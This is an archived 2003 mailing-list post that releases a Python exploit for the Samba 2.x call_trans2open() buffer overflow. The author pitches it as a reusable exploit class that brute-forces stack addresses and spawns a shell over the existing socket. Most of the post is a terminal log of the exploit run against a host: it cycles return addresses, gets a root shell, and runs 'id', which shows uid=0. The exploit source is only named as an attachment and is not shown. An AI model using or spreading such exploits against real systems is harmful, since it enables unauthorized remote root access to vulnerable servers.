samba 2.x call_trans2open() exploit
From: noir sin (noir@olympos.org)
Date: Tue Apr 08 2003 - 06:01:00 CDT
0day is fragile! one day it's your precious, next day it's worthless ...
anyways i put together this SAMBAExploit class in python which might be
interesting for folks since it's reusable in many other stuff ...
python cause; write once a heap, stack or fmt string exploit class and the
rest is just to "cp old_exp.py new_exp.py; vi new_exp.py"
exploit bruteforces all possible stack range and dups the already
connected socket for spawning the shell
greets to: Michael Teo for pysmb, lsd-pl for linux/findsck shellcode
- noir
noir@juneof44:/tmp/samba_exp2 > python samba_exp.py 172.17.1.132
[*] brute forcing well known addr range ... [*]
trying; retaddr: 0xbffed404
trying; retaddr: 0xbffed504
trying; retaddr: 0xbffed604
trying; retaddr: 0xbffed704
Linux localhost 2.4.9-e.3 #1 Fri May 3 17:02:43 EDT 2002 i686 unknown
cat /etc/redhat-rel*
Red Hat Linux Advanced Server release 2.1AS (Pensacola)
id
uid=0(root) gid=0(root) groups=99(nobody)
exit
*** Connection closed by remote host ***
- APPLICATION/X-GUNZIP attachment: samba_exp2.tar.gz